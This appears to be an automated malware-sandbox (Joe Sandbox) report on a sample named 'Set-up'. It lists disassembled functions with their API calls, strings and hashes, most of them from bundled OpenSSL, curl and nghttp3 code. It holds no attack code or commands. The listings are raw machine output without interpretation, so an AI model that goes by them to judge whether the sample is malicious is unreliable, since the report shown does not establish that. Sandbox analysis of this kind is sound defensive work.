Instruction Fuzzy Hash: 2DB147616483929FDB218E25A4A07767FC5AF92744F0CC4ADDEC88B3C3D725CD09AB52

Function 0067A1B0 Relevance: 15.2, APIs: 3, Strings: 7, Instructions: 174stringCOMMON

Download Yara Rule

APIs

Part of subcall function 006EB4B0: GetEnvironmentVariableW.KERNEL32(OPENSSL_WIN32_UTF8,00000000,00000000,?,?,00000000,00000000,00000000,?,006F7667,OPENSSL_MODULES), ref: 006EB4CA
Part of subcall function 006EB4B0: GetACP.KERNEL32(?,?,00000000,00000000,00000000,?,006F7667,OPENSSL_MODULES), ref: 006EB4D4
Part of subcall function 006EB4B0: MultiByteToWideChar.KERNEL32(00000000,00000000,006F7667,000000FF,00000000,00000000,?,?,00000000,00000000,00000000,?,006F7667,OPENSSL_MODULES), ref: 006EB53B
Part of subcall function 006EB4B0: MultiByteToWideChar.KERNEL32(00000000,00000000,006F7667,000000FF,-00000008,00000000,?,?,?,00000000,00000000,00000000,?,006F7667,OPENSSL_MODULES), ref: 006EB5A1
Part of subcall function 006EB4B0: GetEnvironmentVariableW.KERNEL32(-00000008,00000000,00000000,?,?,?,00000000,00000000,00000000,?,006F7667,OPENSSL_MODULES), ref: 006EB5B4
Part of subcall function 006EB4B0: GetEnvironmentVariableW.KERNEL32(?,-00000008,00000000,?,?,?,?,00000000,00000000,00000000,?,006F7667,OPENSSL_MODULES), ref: 006EB648
Part of subcall function 006EB4B0: WideCharToMultiByte.KERNEL32 ref: 006EB67F

Part of subcall function 006EB4B0: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(006F7667,?,?,00000000,00000000,00000000,?,006F7667,OPENSSL_MODULES), ref: 006EB504

strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 0067A1F0
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 0067A20B
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,00000000,00000000), ref: 0067A25D

Strings

server, xrefs: 0067A2E7, 0067A2EF
_%s.sqlog, xrefs: 0067A2F0
QLOGDIR, xrefs: 0067A1BB
ssl/quic/qlog.c, xrefs: 0067A23E, 0067A375, 0067A38C
%02x, xrefs: 0067A29F
OSSL_QFILTER, xrefs: 0067A1CA
client, xrefs: 0067A2E2

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID: ByteCharEnvironmentMultiVariableWide$strlen$getenvmemcpy
String ID: %02x$OSSL_QFILTER$QLOGDIR$_%s.sqlog$client$server$ssl/quic/qlog.c
API String ID: 2744062652-2540125403
Opcode ID: 0bc7242139731831bed4ac50d27d4653bb760b463b7ae83a4226ffa31ada04be
Instruction ID: 53b8c9f41fc098e4c1beeb39f0eef219785434ccd58d78285ee5c9b1ca95bc8a
Opcode Fuzzy Hash: 0bc7242139731831bed4ac50d27d4653bb760b463b7ae83a4226ffa31ada04be
Instruction Fuzzy Hash: 5A5103B2A043446BEB50AAA59C42B2F76DA9FC0309F08847CFC8D86343FB65DD448666

Function 005327E0 Relevance: 14.3, APIs: 3, Strings: 5, Instructions: 299stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 0053284C

Strings

%s%s%s, xrefs: 00532834
Please URL encode %% as %%25, see RFC 6874., xrefs: 005329E3
No valid port number in connect to host string (%s), xrefs: 00532C4B
Alt-svc connecting from [%s]%s:%d to [%s]%s:%d, xrefs: 00532DA3
url.c, xrefs: 00532863, 005328B0, 00532CF9, 00532DDE

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID: strlen
String ID: %s%s%s$Alt-svc connecting from [%s]%s:%d to [%s]%s:%d$No valid port number in connect to host string (%s)$Please URL encode %% as %%25, see RFC 6874.$url.c
API String ID: 39653677-4104037097
Opcode ID: 4d006052211959c0b539e89122f9cf4473aef7f8684c5753d656062ad9d57daa
Instruction ID: 14c060f41d72f2d2770f39ff611b8f91341ece74672b83ec9f4f3f65903c34a9
Opcode Fuzzy Hash: 4d006052211959c0b539e89122f9cf4473aef7f8684c5753d656062ad9d57daa
Instruction Fuzzy Hash: 35A142B06047056FEB248E18C855B7A7FD6BF85354F08886CFD898B293E7719C42C7A2

Function 0054A260 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 160networkCOMMON

Download Yara Rule

APIs

getpeername.WS2_32(?,?,00000080), ref: 0054A376
WSAGetLastError.WS2_32 ref: 0054A380

Part of subcall function 005178B0: closesocket.WS2_32(?), ref: 005178BB

Part of subcall function 0054EF30: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,00000001,?,?), ref: 0054EF6F

_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0054A3D2
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0054A3D6

Strings

getpeername() failed with errno %d: %s, xrefs: 0054A3A0
cf-socket.c, xrefs: 0054A2E9
ssrem inet_ntop() failed with errno %d: %s, xrefs: 0054A3F4
accepted_set(sock=%d, remote=%s port=%d), xrefs: 0054A488

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID: _errno$ErrorLastclosesocketgetpeername
String ID: accepted_set(sock=%d, remote=%s port=%d)$cf-socket.c$getpeername() failed with errno %d: %s$ssrem inet_ntop() failed with errno %d: %s
API String ID: 1501154218-2965463112
Opcode ID: e02d667e7f8426c7dcb4a1940d19111a8e5a10092576f154aa530f746776e25a
Instruction ID: f522138d14c2bf58da93492ae1463d8ad2d851cdf45a666eeb5dc031f81a3bf9
Opcode Fuzzy Hash: e02d667e7f8426c7dcb4a1940d19111a8e5a10092576f154aa530f746776e25a
Instruction Fuzzy Hash: 3C513835904341ABEB61DF24DC46FE67BB4BF81318F044518F94D47292EB72A989CB92

Function 005BA5A0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 124COMMON

Download Yara Rule

APIs

memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000001,?,0000000F), ref: 005BA5FC
memmove.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,0000000F), ref: 005BA698
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?), ref: 005BA6BF
_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(i + 1 < blk->n,nghttp3_ksl.c,0000019B), ref: 005BA6EB
_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(lblk->n + rblk->n < NGHTTP3_KSL_MAX_NBLK,nghttp3_ksl.c,000001A2), ref: 005BA700

Strings

lblk->n + rblk->n < NGHTTP3_KSL_MAX_NBLK, xrefs: 005BA6FB
i + 1 < blk->n, xrefs: 005BA6E6
nghttp3_ksl.c, xrefs: 005BA6E1, 005BA6F6

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID: _assertmemcpy$memmove
String ID: i + 1 < blk->n$lblk->n + rblk->n < NGHTTP3_KSL_MAX_NBLK$nghttp3_ksl.c
API String ID: 3463011695-2629231663
Opcode ID: 8e5317f21d8e9a64521c6f69047e4db7b763d87d20ceda4a036784b209ab093f
Instruction ID: eef0170f9b58468901c55a2efb7e076ed785cda12bcab782730ebcd82da251e5
Opcode Fuzzy Hash: 8e5317f21d8e9a64521c6f69047e4db7b763d87d20ceda4a036784b209ab093f
Instruction Fuzzy Hash: CB418275A043059FC708DF18D88196ABBE5FF98304F18C96DF8498B352E670ED41CB91

Function 00752480 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 77encryptionCOMMON

Download Yara Rule

APIs

CertGetCertificateContextProperty.CRYPT32(00000000,00000002,00000000), ref: 00752491
CertGetCertificateContextProperty.CRYPT32(00000000,00000002,00000000), ref: 007524C6
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,0074F5B4), ref: 00752529

Strings

ERR_CAPI_error, xrefs: 007524EF
engines/e_capi.c, xrefs: 007524A6, 0075251C, 00752559
engines/e_capi_err.c, xrefs: 007524F6
%lX, xrefs: 00752534
Error code= 0x, xrefs: 00752545

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID: CertCertificateContextProperty$ErrorLast
String ID: %lX$ERR_CAPI_error$Error code= 0x$engines/e_capi.c$engines/e_capi_err.c
API String ID: 2217977984-837018288
Opcode ID: 8a73afe8ba9cb92a8bfa8741f0027dd5ebf14c0bde401c378adbb6ca19045a82
Instruction ID: 577796534cf295ad973fb31d7885252ff293882c7f447cd9cdedfd4c9888e423
Opcode Fuzzy Hash: 8a73afe8ba9cb92a8bfa8741f0027dd5ebf14c0bde401c378adbb6ca19045a82
Instruction Fuzzy Hash: 0211C8A5B8030077F6603371BC4BF3B3A4DDB52B45F044068BD09A81E3F5F599258ABA

Function 00562430 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 277stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00562666
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00562699
_time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000), ref: 005626FB
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000018,?,?), ref: 0056273A

Strings

Shuffling %i addresses, xrefs: 005624A6
hostip.c, xrefs: 005624B4, 0056253F, 00562613, 00562626, 00562673, 0056276D, 005627AF
:%u, xrefs: 005626CC

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID: strlen$_time64memcpy
String ID: :%u$Shuffling %i addresses$hostip.c
API String ID: 2198566249-1766712111
Opcode ID: c229493032043c7c53425433bc4219b2a76d6ea091fed614cc3c3ce1b5105744
Instruction ID: fad7627af60e75ce9659ed363be7c0e596e5d1577492213c10e026d75f37f3d4
Opcode Fuzzy Hash: c229493032043c7c53425433bc4219b2a76d6ea091fed614cc3c3ce1b5105744
Instruction Fuzzy Hash: 88A1E175604B019BD734DF18C845BAABBE5FF98304F18882DED8A87392E735E9518B81

Function 00896940 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 152COMMON

Download Yara Rule

APIs

_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000,?,00000009,?), ref: 008969F1
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000001,00000000,00000000,?,00000009,?), ref: 00896A11
memset.API-MS-WIN-CRT-STRING-L1-1-0(?,000000FF,?,?,?,?,?,00000001,00000000,00000000,?,00000009,?), ref: 00896A53
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,?,?,?,?,?,00000001,00000000,00000000,?,00000009,?), ref: 00896AB6
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00000001,00000000,00000000,?,00000009,?), ref: 00896AC7
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00000001,00000000,00000000,?,00000009,?), ref: 00896ADA

Strings

UTF-8, xrefs: 008969AF

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID: _errno$abortmemcpymemset
String ID: UTF-8
API String ID: 3754757788-243350608
Opcode ID: f528b4aa29557ac4832ccccc7a9802a64069f38b83425ef4e1617f6f42447d6a
Instruction ID: 31641ac10952ac13c14db9d3b217b4e00776ba6b34716e2bfe09f766116acc6d
Opcode Fuzzy Hash: f528b4aa29557ac4832ccccc7a9802a64069f38b83425ef4e1617f6f42447d6a
Instruction Fuzzy Hash: AB41C070A08311AFDF11AF28D895B2A7BE5FB85354F0C892DF885C7282F631DC24C652

Function 0051230E Relevance: 12.1, APIs: 4, Strings: 4, Instructions: 133stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00512359
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00512465
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 005124AB
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 005123EE

Part of subcall function 00511A54: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00511A70

Strings

, xrefs: 0051234F
Memory allocation failed for decrypted data., xrefs: 00512411
, xrefs: 0051234B
, xrefs: 00512367

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID: free$abortmallocstrlen
String ID: $ $ $Memory allocation failed for decrypted data.
API String ID: 673139954-1317699236
Opcode ID: b5022830ec323f8349cecab23169503ae0174b3210d64fd00045cca81775a50d
Instruction ID: dcd7f598514d77af119d55d2bdaf31553ed33b4672c2bc9df95e39abd98fe83a
Opcode Fuzzy Hash: b5022830ec323f8349cecab23169503ae0174b3210d64fd00045cca81775a50d
Instruction Fuzzy Hash: 535192B4A04709DFDB40EFA9C08599EBBF1FF88300F10895AE85897315E774D9848F96

Function 0072E110 Relevance: 12.1, APIs: 2, Strings: 6, Instructions: 90stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 0072E16C
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 0072E17B

Strings

for, xrefs: 0072E154
:, xrefs: 0072E15C
er , xrefs: 0072E13D
crypto/ui/ui_lib.c, xrefs: 0072E195
, xrefs: 0072E14D
Ente, xrefs: 0072E145

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID: strlen
String ID: $ for$:$Ente$crypto/ui/ui_lib.c$er
API String ID: 39653677-1187194756
Opcode ID: 42dc0b0923c92da94c46e06643b6ed6c527b8d6c5434076a41883a6afdce7f3e
Instruction ID: 71e383ebd98d0e123a7264a53977ab2a17587e7ff9ff2c67b0fce94b15c92c7d
Opcode Fuzzy Hash: 42dc0b0923c92da94c46e06643b6ed6c527b8d6c5434076a41883a6afdce7f3e
Instruction Fuzzy Hash: 5321C8F6D053647BE610AA166C42D6B77ECED91394F09443DFD0C86242F636C924C2E3

Function 00526330 Relevance: 12.1, APIs: 8, Instructions: 77sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 0052D8C0: QueryPerformanceCounter.KERNEL32(?,?,?,?,?,00000000,?,0000001C,?,005201B1), ref: 0052D8E2

_strdup.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,0055420E,?,?), ref: 00526350
_strdup.API-MS-WIN-CRT-STRING-L1-1-0(0055420E,?,?,?,?,?,?,?,?,?,0055420E,?,?), ref: 0052635B
MoveFileExA.KERNEL32(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 00526369
Sleep.KERNEL32(00000001), ref: 005263B2
MoveFileExA.KERNEL32(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 005263BC
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,0055420E,?,?), ref: 005263C7
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,0055420E,?,?), ref: 005263D6

Part of subcall function 0052D8C0: GetTickCount.KERNEL32 ref: 0052D968

free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 005263ED

Memory Dump Source

Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_Set-up.jbxd

Similarity

API ID: free$FileMove_strdup$CountCounterPerformanceQuerySleepTick
String ID:
API String ID: 1793959362-0
Opcode ID: 7bd4fac319445b9fc66338db1d579d6b7da250b5da431391b84d9a86915dd7e7
Instruction ID: 9ff4e931bc7f4d6314b10d64b39aeb47f12c3813e56d6df3dd8ea9d391198526
Opcode Fuzzy Hash: 7bd4fac319445b9fc66338db1d579d6b7da250b5da431391b84d9a86915dd7e7
Instruction Fuzzy Hash: 4E11F9B7C0026557EB11B6247C42B7F7668BFA7724F080524FC4993282FB21D95482D3

